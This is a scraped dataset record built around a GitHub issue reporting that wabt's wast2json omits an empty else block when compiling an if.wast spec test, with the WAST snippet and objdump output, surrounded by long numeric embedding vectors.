0.0033180713653564453, 0.008915222249925137, 0.005091060884296894, 0.017522098496556282, 0.00300469808280468, -0.017052875831723213, -0.0030063737649470568, 0.011730555444955826, 0.016999250277876854, 0.021664660423994064, 0.006187030114233494, 0.0003221713122911751, 0.00017438727081753314, 0.004169374704360962, -0.009498398751020432, 0.019305143505334854, 0.018259447067975998, -0.01773660071194172, 0.004487775266170502, -0.009143129922449589, 0.016007181257009506, -0.0021366369910538197, -0.007923152297735214, -0.0018685099203139544, -0.014706765301525593, 0.02084687352180481, 0.037323277443647385, 0.006746745202690363, 0.020779840648174286, 0.009431366808712482, -0.0018735373159870505, -0.019331954419612885, -0.022562885656952858, 0.031987547874450684, -0.0028823651373386383, -0.003824161132797599, -0.010510577820241451, -0.013386239297688007, 0.009927401319146156, -0.02276398055255413, 0.006776909343898296, -0.0024835262447595596, 0.024359336122870445, 0.028662774711847305, -0.017200345173478127, 0.003978333901613951, 0.006056318059563637, -0.026128973811864853, 0.008566657081246376, 0.0005203339387662709, 0.0031706015579402447, 0.014894453808665276, -0.0048162308521568775, -0.024144833907485008, 0.003951521590352058, -0.0013707991456612945, 0.007252834737300873, 0.012776250950992107, -0.033408623188734055, -0.0181253831833601, -0.011857915669679642, -0.005972528364509344, -0.012320434674620628, 0.009511804208159447, 0.013299098238348961, 0.015202799811959267, -0.016302119940519333, 0.0033867789898067713, 0.020659184083342552, -0.011717149056494236, -0.0033851030748337507, -0.01378172729164362, 0.0013372832909226418, 0.006726635619997978, 0.012461201287806034, 0.006183678284287453, -0.01571224071085453, -0.00029095966601744294, -0.0040017953142523766, 0.010430139489471912, 0.010249153710901737, 0.023367267102003098, -0.0088146748021245, 0.013835351914167404, 0.007413710933178663, 0.005422868300229311, -0.0027550046797841787, 0.03214842453598976, 0.004923481494188309, 0.024024177342653275, 0.016476403921842575, -0.015551364980638027, 0.0009711224120110273, 0.014679952524602413, -0.005111170466989279, 0.01781703718006611, 0.012059010565280914, -0.02307232655584812, 0.009665977209806442, 0.00611329497769475, 0.005238530691713095, 0.0013213632628321648, -0.013520303182303905, -0.001463805790990591, -0.0008500463445670903, 0.022227726876735687, 0.010859142988920212, -0.008244904689490795, -0.015269831754267216, 0.010973096825182438, 0.00630098395049572, 0.010443545877933502, -0.012045604176819324, 0.01843372918665409, 0.005664182361215353, -0.005439626052975655, -0.008720830082893372, -0.014478856697678566, -0.028850462287664413, 0.009223568253219128, 0.018916359171271324, 0.008097434416413307, -0.019693925976753235, 0.00886830035597086, 0.0005789867136627436, -0.003214172087609768, 0.0036331205628812313, -0.0001273603120353073, 0.0022874583955854177, 0.04088936373591423, 0.00559379905462265, 0.01659706048667431, 0.0021768559236079454, 0.017307596281170845, 0.029359905049204826, -0.009216864593327045, -0.004514588043093681, -0.01261537428945303, 0.009082801640033722, -0.003653230145573616, -0.006833886262029409, -0.002084687352180481, 0.0046385969035327435, -0.040621235966682434, -0.008821377530694008, -0.014907860197126865, 0.02914540283381939, 0.00945147592574358, 0.02287123166024685, 0.010624531656503677, -0.011790883727371693, 0.008881705813109875, 0.014371606521308422, 0.0038576768711209297, -0.003874434856697917, 0.015430707484483719, 0.00002147110535588581, -0.01200538594275713, 0.010001135990023613, -0.019090641289949417, 0.03920016437768936, -0.005855223163962364, 0.004212945234030485, 0.019037015736103058, -0.0023410837166011333, 0.007125474512577057, 0.0006242331000976264, -0.010503874160349369, -0.03445431590080261, 0.024614056572318077, 0.019077233970165253, 0.002171828644350171, 0.013587335124611855, -0.011878025718033314, -0.004383875988423824, 0.0073466794565320015, 0.005878684110939503, -0.03303324431180954, -0.001543405931442976, -0.009505101479589939, 0.02431911788880825, 0.01734781637787819, 0.030057035386562347, 0.0013959361240267754, 0.03129041939973831, 0.02136971987783909, 0.014612920582294464, 0.016744529828429222, 0.010999909602105618, -0.031987547874450684, 0.010691563598811626, -0.005737917497754097, 0.01929173618555069, 0.011884728446602821, 0.01120100449770689, -0.002961127320304513, 0.017750006169080734, 0.015055329538881779, 0.010168715380132198, -0.030110659077763557, 0.025753596797585487, 0.0032476880587637424, -0.006394828669726849, -0.003566088853403926, 0.004601729102432728, 0.01823263429105282, -0.013098003342747688, -0.014063260518014431, 0.007943261414766312, 0.007755572907626629, 0.03295280784368515, -0.0064585087820887566, -0.008352155797183514, 0.009391147643327713, -0.008405780419707298, -0.020699402317404747, 0.0033499114215373993, 0.01156297605484724, -0.017508691176772118, 0.0018752131145447493, -0.010872549377381802, -0.023420892655849457, -0.002796899527311325, -0.0019573268946260214, -0.034159377217292786, 0.02826058305799961, 0.0009744740091264248, 0.021409939974546432, -0.0015836249804124236, 0.018554387614130974, 0.0026360233314335346, -0.005476493388414383, 0.0005911362241022289, -0.012876798398792744, -0.011569678783416748, -0.012736031785607338, 0.013533709570765495, -0.0019673816859722137, -0.011321661993861198, -0.002305892063304782, 0.0008190441294573247, -0.017481878399848938, -0.010510577820241451, -0.007621509488672018, 0.007453930098563433, 0.003810754744336009, -0.01081222016364336, 0.008016997016966343, -0.024533618241548538, 0.007199209649115801, 0.012092527002096176, 0.014317980967462063, -0.005305562634021044, 0.002186910714954138, 0.0056407214142382145, -0.0053826491348445415, 0.0075879935175180435, 0.012481311336159706, -0.001397611922584474, 0.005034083966165781, -0.010235747322440147, 0.00494023971259594, -0.010778704658150673, 0.010349701158702374, 0.001865158323198557, -0.023528141900897026, -0.018313072621822357, -0.02478833869099617, 0.0003552682464942336, -0.013466677628457546, 0.014840828254818916, 0.008707423694431782, -0.009169942699372768, 0.011898134835064411, -0.008942035026848316, -0.010316185653209686, 0.001865158323198557, 0.011469131335616112, 0.0041291555389761925, -0.0059457155875861645, -0.006368015892803669, -0.004578268155455589, 0.034266628324985504, 0.014358200132846832, 0.0016699283150956035, 0.002406439743936062, 0.013466677628457546, -0.009665977209806442, -0.006290929391980171, 0.025834035128355026, -0.019385579973459244, -0.009029176086187363, -0.019398987293243408, 0.007849417626857758, -0.005030732601881027, 0.0167713426053524, 0.007132177706807852, -0.013513599522411823, 0.008318639360368252, -0.003529221285134554, -0.020243586972355843, 0.06772887706756592, -0.008372264914214611, -0.009029176086187363, -0.024225272238254547, -0.007903043180704117, 0.002822036389261484, -0.0160473994910717, -0.014304574579000473, -0.02919902838766575, 0.04064805060625076, 0.0116166016086936, 0.01954645663499832, -0.004152616485953331, 0.001990842865779996, 0.007567883934825659, 0.007413710933178663, -0.004782714881002903, -0.040567610412836075, 0.0035124635323882103, 0.00020423735259100795, 0.006317742168903351, -0.009954214096069336, 0.014116885140538216, 0.021074781194329262, -0.005546876695007086, -0.008157763630151749, 0.007487446069717407, 0.006998114287853241, -0.018701856955885887, -0.003116976236924529, 0.021047968417406082, 0.0010012866696342826, -0.014881047420203686, 0.019841397181153297, 0.0033733726013451815, -0.00005462039916892536, -0.0019992217421531677, 0.0021198790054768324, 0.028796838596463203, -0.0017361221835017204, 0.005801597610116005, -0.0034487831871956587, 0.029252653941512108, 0.01083903294056654, -0.0013934223679825664, -0.025914473459124565, -0.006052966695278883, 0.009149833582341671, -0.013413052074611187, -0.005198311991989613, -0.004145913291722536, 0.008184576407074928, -0.01796450838446617, -0.015296644531190395, -0.0004516263725236058, 0.006699822843074799, -0.014130291528999805, -0.0005882035475224257, 0.011971869505941868, -0.006823831703513861, -0.0075879935175180435, -0.014934672974050045, -0.0007666755700483918 ]
null
null
null
null
null
null
null
null
null
[ "WebAssembly", "wabt" ]
The following WAST test expression from [if.wast](https://github.com/WebAssembly/spec/blob/228549757b301c698c5588ec0d58b201b5777c92/test/core/if.wast#L935) miscompiles, omitting the empty else block: ```wast (assert_invalid (module (func $type-else-value-empty-vs-num (result i32) (if (result i32) (i32.const 1) (then (i32.const 0)) (else)) )) "type mismatch" ) ``` ```console $ wast2json if.wast $ wasm-objdump -x -d if.0.wasm if.0.wasm: file format wasm 0x1 Section Details: Type[1]: - type[0] () -> i32 Function[1]: - func[0] sig=0 Code[1]: - func[0] size=9 Code Disassembly: 000017 func[0]: 000018: 41 01 | i32.const 1 00001a: 04 7f | if i32 00001c: 41 00 | i32.const 0 00001e: 0b | end 00001f: 0b | end ``` WABT version: 0df6c26d2a6122afcc2c32ff6b608326258d40d9
`wast2json` miscompiles "if.wast" from the specification tests
https://api.github.com/repos/WebAssembly/wabt/issues/2417/comments
4
2024-05-12T05:53:57
2024-05-14T22:46:58Z
https://github.com/WebAssembly/wabt/issues/2417
2,291,180,539
2,417
false
This is a GitHub Issue repo:wabt owner:WebAssembly Title : `wast2json` miscompiles "if.wast" from the specification tests Issue date: --- start body --- The following WAST test expression from [if.wast](https://github.com/WebAssembly/spec/blob/228549757b301c698c5588ec0d58b201b5777c92/test/core/if.wast#L935) miscompiles, omitting the empty else block: ```wast (assert_invalid (module (func $type-else-value-empty-vs-num (result i32) (if (result i32) (i32.const 1) (then (i32.const 0)) (else)) )) "type mismatch" ) ``` ```console $ wast2json if.wast $ wasm-objdump -x -d if.0.wasm if.0.wasm: file format wasm 0x1 Section Details: Type[1]: - type[0] () -> i32 Function[1]: - func[0] sig=0 Code[1]: - func[0] size=9 Code Disassembly: 000017 func[0]: 000018: 41 01 | i32.const 1 00001a: 04 7f | if i32 00001c: 41 00 | i32.const 0 00001e: 0b | end 00001f: 0b | end ``` WABT version: 0df6c26d2a6122afcc2c32ff6b608326258d40d9 --- end body ---
1,113
[ -0.00935562327504158, 0.036001745611429214, -0.010357250459492207, 0.01629597507417202, 0.014789982698857784, 0.009035955183207989, 0.025587664917111397, 0.035717595368623734, -0.043133899569511414, 0.0011010793969035149, -0.0008306934032589197, 0.03665528818964958, 0.02335709147155285, 0.013312404975295067, -0.018981188535690308, 0.021524326875805855, 0.003775636898353696, 0.03594491630792618, 0.012339193373918533, -0.013489998877048492, 0.000025556808395776898, 0.04202571511268616, -0.0006641995278187096, 0.05489768832921982, -0.004759504459798336, -0.010684022679924965, 0.018768075853586197, -0.0002153320674551651, -0.03148376941680908, -0.0100731011480093, -0.01720525324344635, 0.03551869094371796, -0.012758313678205013, -0.006840900052338839, 0.011912968941032887, 0.015784505754709244, 0.020870782434940338, 0.07291276752948761, -0.028699101880192757, 0.006602924782782793, -0.01106762420386076, -0.011678545735776424, -0.015287244692444801, -0.05168680101633072, -0.02668164111673832, 0.03651321306824684, 0.03611540421843529, -0.007220949977636337, -0.023939598351716995, -0.009447972290217876, 0.003059935290366411, -0.017262084409594536, 0.03520612791180611, -0.06700246036052704, 0.05128898844122887, 0.024323198944330215, 0.027931898832321167, 0.019563695415854454, 0.019038017839193344, 0.022717755287885666, -0.013305301778018475, 0.01092554908245802, -0.020330898463726044, -0.006869314704090357, -0.029082704335451126, 0.020188823342323303, -0.00813378021121025, 0.033131834119558334, 0.011451225727796555, -0.0009119423921220005, -0.0017297602025792003, -0.0013381666503846645, -0.0036140268202871084, 0.05336328223347664, 0.02969362586736679, -0.014200372621417046, 0.0007472244906239212, 0.01665116287767887, 0.009135407395660877, -0.009206444956362247, -0.022689340636134148, -0.01524462178349495, -0.01531565934419632, -0.03588808700442314, -0.03438209369778633, 0.03955361619591713, -0.038559090346097946, -0.03784871846437454, 0.0032268729992210865, -0.014832605607807636, 0.029324231669306755, 0.01075505930930376, 0.00019546379917301238, -0.008084054104983807, 0.004105960484594107, 0.01933637633919716, -0.01309929322451353, 0.01574188470840454, -0.028159217908978462, -0.007998809218406677, -0.016168108209967613, 0.02955155074596405, -0.012239741161465645, 0.020785538479685783, 0.03466624394059181, -0.0065958211198449135, 0.03909897431731224, -0.0007698676199652255, 0.020728707313537598, 0.11462592333555222, 0.0024490137584507465, 0.02273196168243885, -0.06370632350444794, -0.03293292969465256, 0.00531714828684926, 0.012111873365938663, -0.004777263849973679, -0.005729164928197861, -0.0032179933041334152, 0.03105754405260086, -0.001939320587553084, 0.0311996191740036, -0.002674557501450181, -0.014221684075891972, 0.0036300101783126593, 0.007927771657705307, -0.0014908970333635807, 0.0022696442902088165, 0.009327208623290062, -0.016068655997514725, -0.023413920775055885, -0.037536151707172394, 0.009376934729516506, -0.026283832266926765, 0.022646717727184296, -0.033870622515678406, -0.02895483747124672, 0.040377646684646606, -0.030034605413675308, -0.05208460986614227, -0.029466306790709496, -0.0369962677359581, 0.054926104843616486, 0.03148376941680908, 0.004837645683437586, 0.00035074708284810185, 0.012502579018473625, 0.03139852359890938, 0.004329728428274393, -0.0038857448380440474, 0.00008457888179691508, -0.00017082270642276853, 0.027122072875499725, 0.006158940959721804, 0.028485991060733795, 0.03668370470404625, 0.02888379991054535, -0.013006945140659809, 0.01064850389957428, -0.002699420554563403, -0.006762758828699589, -0.040235571563243866, -0.02440844476222992, -0.02514723315834999, -0.00772886723279953, 0.042679257690906525, 0.005469878204166889, 0.058136992156505585, 0.008403722196817398, 0.0036939438432455063, 0.010101515799760818, 0.007135705091059208, 0.008503174409270287, -0.003701047506183386, -0.0350356362760067, 0.004233827814459801, 0.006336534395813942, 0.037053097039461136, -0.0031132132280617952, 0.0047630565240979195, 0.004411421250551939, -0.01351841352880001, -0.006780518218874931, -0.013433168642222881, 0.015116754919290543, -0.03392745554447174, -0.014306928962469101, -0.01866862364113331, 0.01765989325940609, -0.027775617316365242, -0.010698230005800724, 0.0006766310543753207, 0.008744701743125916, 0.00266212597489357, -0.006855107378214598, 0.030801808461546898, -0.02751988172531128, -0.04893054813146591, -0.011437018401920795, 0.040718626230955124, 0.03489356115460396, 0.0036797362845391035, 0.0175604410469532, 0.006379156839102507, -0.026695847511291504, 0.032194141298532486, 0.021098103374242783, 0.0061553893610835075, 0.017162632197141647, -0.022007381543517113, -0.031142788007855415, -0.03864433616399765, 0.020785538479685783, -0.03392745554447174, -0.0019712874200195074, 0.012218429706990719, 0.01463370118290186, -0.00007042690413072705, -0.030091434717178345, 0.005278077442198992, 0.0015867975307628512, -0.0008040543762035668, -0.0441284216940403, 0.011096038855612278, -0.04157107695937157, 0.037223588675260544, -0.011870346963405609, -0.034325264394283295, -0.02304452657699585, 0.04716882109642029, 0.026326453313231468, -0.018966980278491974, 0.019080640748143196, 0.00919934082776308, -0.010527740232646465, -0.007586792577058077, -0.016864273697137833, -0.004731089808046818, -0.012729899026453495, 0.00474884919822216, 0.026425905525684357, 0.0015450631035491824, -0.028826970607042313, -0.042224619537591934, -0.022533057257533073, 0.04577649012207985, -0.019819429144263268, -0.01832764409482479, -0.013092189095914364, 0.019734185189008713, -0.0019979262724518776, -0.027122072875499725, -0.016139693558216095, 0.012140288949012756, 0.019734185189008713, -0.018895944580435753, -0.0005709629622288048, 0.025999682024121284, 0.005999106913805008, -0.044156838208436966, -0.027889275923371315, 0.03517771139740944, -0.029750455170869827, -0.01619652286171913, 0.027079449966549873, -0.03168267384171486, -0.03725200146436691, -0.006919040810316801, -0.0053206998854875565, -0.02570132538676262, 0.06450194120407104, 0.011607508175075054, -0.013561036437749863, 0.009888404048979282, -0.027704579755663872, 0.017404159530997276, -0.007235157303512096, -0.014349550940096378, -0.009099888615310192, -0.01268017292022705, 0.013930430635809898, 0.02874172478914261, 0.007181879132986069, 0.06495658308267593, 0.02251885086297989, 0.01351841352880001, 0.020544011145830154, 0.03361488878726959, -0.04077545553445816, -0.04458305984735489, -0.01713421568274498, -0.018213985487818718, 0.00687286676838994, 0.03682577982544899, -0.006837347988039255, -0.015287244692444801, 0.007224501576274633, -0.012715691700577736, 0.030659733340144157, 0.009384037926793098, -0.01423589140176773, -0.009604253806173801, 0.006773414555937052, 0.00821902509778738, -0.05302230268716812, 0.03605857491493225, 0.03514929488301277, 0.0003709483426064253, -0.0015317435609176755, -0.021282799541950226, 0.05634685233235359, -0.0014926729490980506, -0.0021932790987193584, -0.02612754888832569, -0.04233827814459801, -0.003567852545529604, 0.03489356115460396, -0.028017142787575722, -0.04398634657263756, 0.011188387870788574, -0.054641954600811005, -0.008574211969971657, -0.016011826694011688, -0.024777838960289955, 0.010478014126420021, -0.037649814039468765, -0.00695811165496707, 0.010250694118440151, -0.05211302265524864, -0.01937899738550186, 0.022390982136130333, -0.02182268351316452, 0.013291094452142715, -0.022774584591388702, 0.012474164366722107, -0.08189189434051514, -0.04861798509955406, -0.03247829154133797, -0.00035785080399364233, -0.04202571511268616, -0.008211920969188213, 0.029892530292272568, 0.010478014126420021, 0.006290360353887081, 0.017290499061346054, -0.043588537722826004, -0.021325422450900078, -0.013276887126266956, 0.015116754919290543, 0.02189372107386589, 0.0008377971244044602, 0.045549169182777405, -0.0031327486503869295, 0.023385506123304367, 0.003892848500981927, 0.004226724151521921, -0.021112309768795967, -0.02668164111673832, 0.04367378354072571, -0.015273037366569042, 0.005160865839570761, -0.008332684636116028, 0.01703476347029209, 0.017844591289758682, 0.006265497300773859, -0.016026033088564873, 0.012168703600764275, -0.04762345924973488, -0.06251289695501328, -0.013880704529583454, -0.007302642799913883, 0.03185316175222397, -0.021552741527557373, 0.003194906283169985, -0.03742249310016632, -0.024252161383628845, -0.007380784023553133, 0.03213731199502945, 0.01206214725971222, 0.02493412047624588, -0.009632669389247894, -0.007920668460428715, 0.02055821754038334, -0.015685053542256355, 0.0016089966520667076, -0.014044090174138546, 0.014562663622200489, 0.028528612107038498, -0.0012591376435011625, -0.005501845385879278, -0.0006184692028909922, 0.042366694658994675, -0.03455258160829544, -0.05248241871595383, -0.019080640748143196, 0.025871815159916878, -0.011877450160682201, -0.03867275267839432, 0.015429319813847542, -0.018611794337630272, 0.02227732352912426, -0.04861798509955406, -0.0017555112717673182, 0.015585601329803467, -0.048106513917446136, 0.01391622330993414, -0.03924104943871498, 0.004539288580417633, 0.022746169939637184, -0.0034097942989319563, 0.009888404048979282, -0.011777997948229313, -0.007693348452448845, 0.01584133692085743, 0.03557552024722099, 0.02031669206917286, 0.032819271087646484, -0.010414080694317818, -0.02531772293150425, 0.037195172160863876, -0.005867687985301018, 0.0034843836911022663, 0.022163663059473038, 0.004642292857170105, 0.031029129400849342, -0.006336534395813942, -0.022632509469985962, 0.003949678502976894, 0.009838677011430264, -0.017006348818540573, -0.0028113042935729027, -0.00836110021919012, 0.010314627550542355, 0.024578934535384178, -0.034495752304792404, 0.0025289307814091444, -0.04304865375161171, -0.004727537743747234, -0.019364790990948677, -0.02084236778318882, 0.034183189272880554, 0.03747932240366936, -0.033415984362363815, -0.03216572850942612, -0.010058892890810966, -0.012637550011277199, -0.040974363684654236, -0.002470324980095029, -0.002882341854274273, -0.0021506566554307938, -0.005917414091527462, 0.03421160206198692, -0.016594331711530685, 0.02895483747124672, 0.010257798247039318, -0.030432414263486862, -0.020572425797581673, -0.006464401725679636, -0.021140724420547485, -0.01531565934419632, -0.04912945255637169, -0.013525517657399178, -0.007451821584254503, 0.005068517290055752, 0.011678545735776424, 0.024110088124871254, -0.0029160846024751663, -0.024678386747837067, -0.00787094235420227, -0.009966544806957245, -0.0009297017240896821, 0.022533057257533073, -0.020416144281625748, -0.002338905818760395, 0.0005634152330458164, 0.015273037366569042, -0.02178006060421467, -0.013752836734056473, -0.009533216245472431, -0.0178730059415102, 0.021041272208094597, 0.02395380474627018, 0.016139693558216095, -0.004251587204635143, -0.0034577446058392525, -0.01561401691287756, 0.03367171809077263, 0.007941978983581066, 0.005278077442198992, 0.030659733340144157, 0.017006348818540573, -0.03134169429540634, -0.00005777336991741322, -0.018071910366415977, 0.011479641310870647, -0.003551869187504053, 0.029949359595775604, -0.027363600209355354, 0.012737002223730087, -0.0011010793969035149, 0.008346891961991787, -0.0383317731320858, 0.007565481122583151, -0.017176838591694832, 0.017787760123610497, -0.05290864408016205, -0.01206214725971222, 0.060069210827350616, -0.02570132538676262, -0.03074497915804386, -0.02878434769809246, -0.07632256299257278, -0.012701484374701977, -0.023342883214354515, 0.002740266965702176, -0.012644654139876366, -0.009249066933989525, -0.013056671246886253, 0.03989459201693535, 0.029892530292272568, -0.011039209552109241, -0.028130803257226944, 0.0074802362360060215, 0.0480496846139431, 0.02902587503194809, 0.008581316098570824, 0.01976259984076023, -0.02608492597937584, 0.0002632823016028851, 0.01713421568274498, 0.0026692296378314495, -0.008673664182424545, -0.0012866646284237504, 0.0304892435669899, 0.010151241905987263, 0.019705770537257195, -0.0415426604449749, 0.02136804535984993, -0.008801531977951527, 0.020117785781621933, 0.02199317328631878, 0.01888173632323742, -0.03861591964960098, 0.016026033088564873, 0.0007125937263481319, 0.028315501287579536, 0.011373084969818592, 0.011358877643942833, -0.005327803548425436, 0.01432113628834486, -0.00814798753708601, -0.016111278906464577, -0.0024525655899196863, 0.016040241345763206, -0.0006420003483071923, 0.010371457785367966, -0.006510576233267784, 0.00012975421850569546, -0.005128899123519659, -0.01811453327536583, -0.004926442634314299, -0.055409159511327744, -0.0039780936203897, -0.007551273796707392, 0.0198336374014616, 0.001886042533442378, 0.010165449231863022, 0.019918881356716156, -0.019890466704964638, -0.023243431001901627, 0.016835859045386314, 0.0028858936857432127, 0.0019410965032875538, 0.003477279795333743, -0.033785380423069, 0.040860701352357864, -0.010854512453079224, -0.005608401261270046, -0.01164302695542574, -0.03094388358294964, 0.02325763925909996, -0.029750455170869827, -0.006759206764400005, 0.0344105064868927, 0.007110842037945986, -0.0233997143805027, 0.00813378021121025, -0.017688307911157608, 0.02220628596842289, 0.011877450160682201, 0.02055821754038334, 0.01909484900534153, -0.041002776473760605, -0.018824907019734383, 0.06256972253322601, -0.02146749757230282, -0.038246527314186096, 0.010222279466688633, 0.042792920023202896, -0.011053416877985, 0.007693348452448845, -0.01049222145229578, -0.009320104494690895, 0.0028521509375423193, -0.022916659712791443, 0.038274940103292465, -0.0208139531314373, -0.019038017839193344, -0.007466028910130262, -0.030716564506292343, 0.00765072600916028, -0.0159123744815588, 0.03480831906199455, -0.011408603750169277, -0.0311996191740036, -0.004340384155511856, 0.005242558661848307, 0.0016258681425824761, 0.007423406466841698, -0.005551571492105722, 0.020032541826367378, -0.03466624394059181, 0.009043058380484581, 0.0013648057356476784, -0.0027988727670162916, 0.03230779990553856, -0.018057702109217644, -0.001448274590075016, 0.002948051318526268, -0.01311350055038929, 0.005622608587145805, -0.006528335623443127, -0.003280151169747114, -0.032023653388023376, -0.008318477310240269, 0.02672426402568817, 0.03367171809077263, 0.01794404350221157, -0.014015675522387028, -0.01148674450814724, 0.006055936682969332, 0.022774584591388702, 0.02189372107386589, 0.01124521717429161, -0.017361536622047424, 0.0023726485669612885, -0.01099658664315939, 0.015727676451206207, 0.010691125877201557, 0.016864273697137833, 0.0011401500087231398, 0.006965215317904949, 0.020430350676178932, 0.012879077345132828, 0.029153741896152496, 0.02151011861860752, 0.0065034725703299046, 0.03137010708451271, 0.01035014633089304, -0.02301611192524433, -0.01260913535952568, -0.058875780552625656, -0.00029924497357569635, -0.02266092412173748, -0.001448274590075016, -0.0064715053886175156, -0.002285627881065011, -0.012126080691814423, -0.01515937689691782, -0.016594331711530685, 0.020487181842327118, -0.04012191295623779, 0.01318453811109066, 0.01304246298968792, 0.004560600034892559, -0.02249043434858322, -0.0003114545252174139, 0.020444558933377266, -0.012530994601547718, 0.006979422643780708, -0.015898166224360466, -0.0007001621997915208, -0.012829351238906384, 0.015031510032713413, -0.008687871508300304, 0.000917270197533071, 0.020259860903024673, 0.007821215316653252, 0.0099168187007308, 0.017617270350456238, 0.008055639453232288, 0.03293292969465256, 0.03179633244872093, -0.019535280764102936, 0.0023708725348114967, 0.022689340636134148, 0.032819271087646484, -0.02409587986767292, -0.02266092412173748, -0.010712437331676483, -0.02017461694777012, 0.014129335060715675, -0.008908087387681007, 0.002495188033208251, -0.0017652789829298854, 0.011515160091221333, 0.005391737446188927, -0.01027910877019167, 0.04878847301006317, 0.02658218890428543, -0.015329866670072079, 0.02165219374001026, 0.002571553224697709, 0.011046312749385834, 0.022774584591388702, -0.008432136848568916, 0.022078419104218483, 0.04302023723721504, -0.04486721009016037, -0.01608286425471306, -0.0020600841380655766, -0.025871815159916878, -0.042224619537591934, -0.004823438357561827, -0.020430350676178932, -0.029324231669306755, -0.016707992181181908, -0.012424438260495663, 0.0072813318111002445, 0.00951190572232008, -0.03165425732731819, -0.0304892435669899, 0.015685053542256355, 0.007934875786304474, -0.04307707026600838, 0.032648779451847076, -0.02196475863456726, -0.011451225727796555, 0.007054012268781662, -0.03929787874221802, 0.0018949221121147275, -0.0024205988738685846, -0.02045876532793045, -0.013383442535996437, -0.006759206764400005, -0.026667432859539986, 0.02790348418056965, -0.007203190587460995, -0.01416485384106636, 0.0064572980627417564, -0.003015536814928055, 0.0001788144145393744, 0.0036229065153747797, -0.010378561913967133, -0.019293753430247307, 0.03222255781292915, 0.01285066269338131, -0.021453289315104485, -0.008055639453232288, -0.006251289509236813, -0.008346891961991787, 0.0017954697832465172, 0.0006819588597863913, 0.0023690967354923487, 0.01950686424970627, -0.02136804535984993, 0.022007381543517113, -0.02773299440741539, 0.018441304564476013, 0.005757580045610666, 0.014271410182118416, 0.005182176828384399, 0.008176403120160103, -0.01375994086265564, 0.0018416441744193435, -0.026496943086385727, -0.02021723985671997, 0.03676895052194595, -0.005278077442198992, 0.021595364436507225, -0.021453289315104485, -0.02969362586736679, 0.006961663253605366, 0.0011463657720014453, 0.0029782422352582216, 0.010854512453079224, 0.0049619609490036964, -0.0416279062628746, 0.02895483747124672, -0.014875227585434914, -0.018753869459033012, -0.06018286943435669, 0.025729740038514137, -0.023001903668045998, -0.005274525843560696, -0.008915191516280174, -0.024962536990642548, 0.022575680166482925, -0.004478906746953726, 0.0031327486503869295, 0.006240634247660637, 0.003528781933709979, -0.014122231863439083, -0.01211897749453783, -0.0047524007968604565, -0.013404753990471363, -0.02742042951285839, -0.0021275696344673634, 0.0031096613965928555, 0.018725454807281494, 0.006546094547957182, 0.01283645536750555, 0.009419556707143784, 0.005210591945797205, 0.017887212336063385, 0.017176838591694832, 0.003892848500981927, 0.00040247116703540087, -0.0018895943649113178, 0.013070878572762012, 0.011515160091221333, 0.01569926179945469, 0.030347170308232307, -0.0136178657412529, -0.00446825148537755, 0.0014553783694282174, 0.02476363070309162, -0.0056687830947339535, 0.01888173632323742, -0.011053416877985, 0.0002983570157084614, -0.012111873365938663, -0.024436859413981438, -0.026340661570429802, -0.01268017292022705, 0.004130824003368616, 0.005860583856701851, -0.013298197649419308, -0.03560393676161766, 0.03330232575535774, 0.011280735954642296, 0.007302642799913883, -0.018213985487818718, -0.01433534361422062, -0.004688467364758253, -0.03151218220591545, -0.015798714011907578, 0.017219461500644684, -0.017716722562909126, 0.010172553360462189, 0.0006792949861846864, 0.030688149854540825, 0.006205115467309952, 0.02780403196811676, -0.031625840812921524, -0.013887808658182621, -0.006411123555153608, 0.006340086460113525, 0.008574211969971657, 0.008417929522693157, -0.008169298991560936, -0.0133266132324934, 0.017176838591694832, -0.01846971921622753, -0.005629712715744972, -0.03031875379383564, -0.007444717455655336, -0.01008730847388506, -0.01026490144431591, -0.014264306053519249, -0.029153741896152496, -0.03077339380979538, 0.010172553360462189, 0.031881578266620636, -0.013561036437749863, 0.02699420601129532, -0.004010060336440802, -0.013681800104677677, -0.00268876482732594, 0.02094181999564171, -0.008915191516280174, 0.02445106767117977, -0.017702516168355942, -0.005104036070406437, 0.026184378191828728, 0.016636954620480537, 0.017262084409594536, -0.030716564506292343, -0.019137470051646233, -0.005338459275662899, 0.014733153395354748, 0.009419556707143784, -0.034041114151477814, 0.014804190024733543, -0.004375902935862541, 0.02251885086297989, -0.00935562327504158, -0.056460510939359665, -0.0015841335989534855, -0.02447948232293129, -0.0046813637018203735, -0.01775934547185898, 0.008964917622506618, -0.004013611935079098, -0.0011348221451044083, -0.011664338409900665, 0.011429915204644203, 0.014072505757212639, 0.005672335159033537, 0.013063774444162846, 0.016693783923983574, -0.011351773515343666, -0.007228053640574217, 0.003775636898353696, -0.04074704274535179, -0.008396618999540806, -0.010712437331676483, -0.013980156742036343, -0.006418227683752775, 0.03330232575535774, -0.031029129400849342, 0.01979101449251175, 0.008517381735146046, 0.009469282813370228, 0.021240176633000374, -0.008687871508300304, -0.0020920508541166782, -0.001355926040560007, -0.00912830326706171, 0.02636907622218132, 0.005817961413413286, -0.025232478976249695, 0.014619492925703526, -0.009831573814153671, 0.031909991055727005, 0.014456107281148434, 0.012182910926640034, 0.014200372621417046, -0.00879442784935236, -0.016693783923983574, 0.0010886478703469038, 0.022021587938070297, 0.03475148603320122, -0.0409175306558609, -0.02672426402568817, 0.027718786150217056, 0.04353170841932297, -0.008467655628919601, -0.026312246918678284, -0.0015450631035491824, -0.013447376899421215, 0.000711261760443449, -0.009590046480298042, -0.00958294328302145, -0.002429478568956256, 0.014690530486404896, -0.009298793040215969, -0.014974679797887802, -0.038559090346097946, 0.020345106720924377, 0.014647908508777618, 0.014676323160529137, 0.0062477379105985165, -0.006475057452917099, -0.0023762003984302282, 0.00045952305663377047, -0.051772043108940125, 0.014292721636593342, 0.012758313678205013, -0.002804200630635023, -0.002029893221333623, 0.0007450045668520033, -0.016693783923983574, 0.03665528818964958, -0.005711405538022518, -0.020828161388635635, -0.007423406466841698, -0.031739503145217896, 0.0168926902115345, -0.002315818564966321, -0.01873966120183468, -0.029523136094212532, 0.007071771193295717, -0.005594193935394287, 0.03165425732731819, -0.003914159722626209, 0.014143542386591434, 0.011422811076045036, -0.024294784292578697, 0.008318477310240269, 0.02206421084702015, -0.024706801399588585, 0.008822842501103878, -0.008908087387681007, -0.017475195229053497, -0.00966818816959858, 0.021027065813541412, 0.0011428139405325055, 0.02304452657699585, -0.011046312749385834, -0.037678226828575134, -0.0001882490614661947, -0.009412453509867191, 0.01206214725971222, -0.017176838591694832, -0.0022945073433220387, 0.025474004447460175, -0.000033132280805148184, -0.031171202659606934, 0.0044504920952022076, 0.015273037366569042, -0.007934875786304474, 0.04571966081857681, -0.010463806800544262, -0.009057266637682915, -0.014314032159745693, 